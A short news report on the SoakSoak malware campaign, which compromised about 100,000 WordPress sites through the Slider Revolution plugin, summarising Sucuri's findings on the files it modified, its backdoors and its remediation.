A Russian malware dubbed SoakSoak has infected nearly 100,000 WordPress websites since Sunday, prompting Google to blacklist over 11,000 of those domains (the number is increasing), according to a report from cybersecurity firm Sucuri.
The malware exploits a previously-known vulnerability in a WordPress plugin called Slider Revolution to modify the file wp-includes/template-loader.php, causing the wp-includes/js/swobject.js to be loaded on every page on the site, which in turn loads the malware from a russian website.
The malware campaign is targeting WordPress users running Internet Explorer on Windows and is also making use of a number of new backdoor payloads, some of which are being injected into images to further assist evasion while others are being used to inject new administrator users into vulnerable WordPress installs.
Replacing the aforementioned files is not a permanent solution as it doesn't address the leftover backdoors and initial entry points, the report notes. The only way to remove the infection is to make sure that the Slider Revolution plugin you are using is up to date, although Sucuri says it won’t be easy.
“The biggest issue is that the RevSlider plugin is a premium plugin, it’s not something everyone can easily upgrade and that in itself becomes a disaster for website owners,” the report said, adding that some websites don’t even know they have the plugin as it’s been bundled into their themes.
If you want to check whether your website is infected or not, you can use Sucuri's free site scanner.